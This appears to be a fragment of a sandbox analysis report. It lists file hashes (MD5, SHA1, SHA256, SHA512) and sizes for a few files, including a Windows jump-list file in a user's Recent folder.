SHA1b97761358338e640a31eef5e5c5773b633890914
SHA25657492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4
SHA512dc657393b96477d6dd51ec87a5adce53d6897ad9cd40c2a4e324284fb71c7b858e4e83ff61ae9c0e60e8c333875481dfb08f73a7121e36e997bac4da54250018
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize5KB
MD5a41b4f125c422116c63994583cb8d3db
SHA14df39e689197f328fed0b49c8c55d36e11aa8076
SHA25607267f566df694c5e4e15054a5c4d332f679b52bf9fccaf30c5aa7de1af708e8
SHA512894b1c4b6c12dbde098496ed0b3180975860c354c188e0a42a2c8f985efd12b2e163bbc2188d13edc01c40502845773167e15ba92ee6abd2219aceea1c84a859
-
Filesize
4KB
MD5821740b3797047b94157666cc0f3455b
SHA150badabfff08e6c51c89f528a5ffa2123356e901
SHA256f19472eb84d7a81e50f907127c9f18cdc0a1c5ddfe974513d98837f8ae2a5578
SHA5124d03c538a64a8ea34cdc99fab14584e43c9d237dbc06682d2be5c0b9a5b9a0f9d2c2e9e86131589d1d767536c2b65d02c992290cb4d7cccbe2e8cd68e54a547d